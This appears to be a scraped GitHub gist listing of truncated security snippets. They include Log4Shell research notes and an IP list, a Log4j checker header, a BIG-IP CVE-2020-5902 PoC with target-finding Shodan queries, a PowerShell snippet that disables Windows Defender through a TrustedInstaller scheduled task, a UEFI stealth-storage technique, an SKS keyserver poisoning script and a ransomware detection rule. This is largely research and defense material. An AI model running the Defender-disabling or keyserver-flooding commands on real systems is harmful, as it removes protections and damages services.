Skip to content

Instantly share code, notes, and snippets.

Avatar

Vesselin Bontchev bontchev

View GitHub Profile
@nathanqthai
nathanqthai / payload_samples.md
Last active Dec 23, 2021
Sample Log4Shell (CVE-2021-44228) payloads observed in the wild by GreyNoise Intelligence
View payload_samples.md

Samples

Enclosed are some sanitized samples of data GreyNoise has identified and collected related to the Log4J vulnerability exploitation in the wild. GreyNoise infrastructure IPs have been removed while preserving the data to the best of our ability. Please note that GreyNoise HAS NOT verified if any of these are effective. These examples are not a comprehensive coverage of all the payloads GreyNoise have observed.

These samples are intended to provide individuals with a clearer idea of some of the variation in the wild.

Examples

The follow section includes Log4Shell samples seen in the wild

URL Encoding and Failed argv Input (????)

What appears to be a failed attempt:

@gnremy
gnremy / CVE-2021-44228_IPs.csv
Last active Jan 9, 2022
CVE-2021-44228 Apache Log4j RCE Attempts Dec 20th 9:27PM ET
View CVE-2021-44228_IPs.csv
ip tag_name
162.155.56.106 Apache Log4j RCE Attempt
223.111.180.119 Apache Log4j RCE Attempt
213.142.150.93 Apache Log4j RCE Attempt
211.154.194.21 Apache Log4j RCE Attempt
210.6.176.90 Apache Log4j RCE Attempt
199.244.51.112 Apache Log4j RCE Attempt
199.101.171.39 Apache Log4j RCE Attempt
197.246.175.186 Apache Log4j RCE Attempt
196.196.150.38 Apache Log4j RCE Attempt
@byt3bl33d3r
byt3bl33d3r / log4j_rce_check.py
Created Dec 10, 2021
Python script to detect if an HTTP server is potentially vulnerable to the log4j 0day RCE (https://www.lunasec.io/docs/blog/log4j-zero-day/)
View log4j_rce_check.py
#! /usr/bin/env python3
'''
Needs Requests (pip3 install requests)
Author: Marcello Salvati, Twitter: @byt3bl33d3r
License: DWTFUWANTWTL (Do What Ever the Fuck You Want With This License)
This should allow you to detect if something is potentially exploitable to the log4j 0day dropped on December 9th 2021.
@geek-at
geek-at / trash.sh
Created Aug 13, 2020
The script used to trash a banking phishing site
View trash.sh
#!/bin/bash
while :; do
verf=$(cat /dev/urandom | tr -dc '0-9' | fold -w 8 | head -n 1)
pin=$(cat /dev/urandom | tr -dc '0-9' | fold -w 5 | head -n 1)
ip=$(printf "%d.%d.%d.%d\n" "$((RANDOM % 256))" "$((RANDOM % 256))" "$((RANDOM % 256))" "$((RANDOM % 256))")
@cihanmehmet
cihanmehmet / CVE-2020-5902.md
Last active Dec 22, 2021
BIGIP CVE-2020-5902 Exploit POC
View CVE-2020-5902.md

🚨BIGIP CVE-2020-5902 Exploit POC 🔥🧱🔨👀


Shodan Seaarch

title:"Big-IP®" org:"Organization Name"
http.title:"BIG-IP®- Redirect" org:"Organization Name"
http.favicon.hash:-335242539 "3992" org:"Organization Name"

🔸LFI

@tyranid
tyranid / doh.ps1
Created May 4, 2020
Something or other.
View doh.ps1
$cmdline = '/C sc.exe config windefend start= disabled && sc.exe sdset windefend D:(D;;GA;;;WD)(D;;GA;;;OW)'
$a = New-ScheduledTaskAction -Execute "cmd.exe" -Argument $cmdline
Register-ScheduledTask -TaskName 'TestTask' -Action $a
$svc = New-Object -ComObject 'Schedule.Service'
$svc.Connect()
$user = 'NT SERVICE\TrustedInstaller'
$folder = $svc.GetFolder('\')
@jthuraisamy
jthuraisamy / _README.md
Last active Dec 28, 2021
GospelRoom: Data Storage in UEFI NVRAM Variables
View _README.md

GospelRoom: Data Storage in UEFI NVRAM Variables

Behaviour

Persist data in UEFI NVRAM variables.

Benefits

  1. Stealthy way to store secrets and other data in UEFI.
  2. Will survive a reimaging of the operating system.
View Kill-Ransomware.ps1
# Ransomware Killer v0.1 by Thomas Patzke <thomas@patzke.org>
# Kill all parent processes of the command that tries to run "vssadmin Delete Shadows"
# IMPORTANT: This must run with Administrator privileges!
Register-WmiEvent -Query "select * from __instancecreationevent within 0.1 where targetinstance isa 'win32_process' and targetinstance.CommandLine like '%vssadmin%Delete%Shadows%'" -Action {
# Kill all parent processes from detected vssadmin process
$p = $EventArgs.NewEvent.TargetInstance
while ($p) {
$ppid = $p.ParentProcessID
$pp = Get-WmiObject -Class Win32_Process -Filter "ProcessID=$ppid"
Write-Host $p.ProcessID
@alpakido
alpakido / fill_the_pool.sh
Last active Dec 13, 2020
Redacted SKS exploit that was sent to me by attacker behind https://news.ycombinator.com/item?id=20312826
View fill_the_pool.sh
for _ in {1..500}; do
for _ in {1..100}; do
gpg --gen-key --batch keygen
gpg --quick-sign-key -u Marc EC18257DB21746FC711054BEB19C61D61333360C
rm ~/.gnupg/private-keys-v1.d/*.key
done
rm ~/.gnupg/openpgp-revocs.d/*.rev
gpg -a --export > ~/Desktop/keyblock.asc
@AveYo
AveYo / .. MediaCreationTool.bat ..md
Last active Jan 21, 2022
Universal MediaCreationTool wrapper for all MCT Windows 10 versions from 1507 to 21H1 with business (Enterprise) edition support
View .. MediaCreationTool.bat ..md

We did it! We broke gist.github.com ;) So head over to the new home! Thank you all!
2021.10.20: https://github.com/AveYo/MediaCreationTool.bat now open for interaction

  • new update introducing no 11 setup checks on boot in VirtualBox

Not just an Universal MediaCreationTool wrapper script with ingenious support for business editions,
Preview
A powerful yet simple windows 10 / 11 deployment automation tool as well!

configure via set vars, commandline parameters or rename script like iso 21H2 Pro MediaCreationTool.bat
recommended windows setup options with the least amount of issues on upgrades set via auto.cmd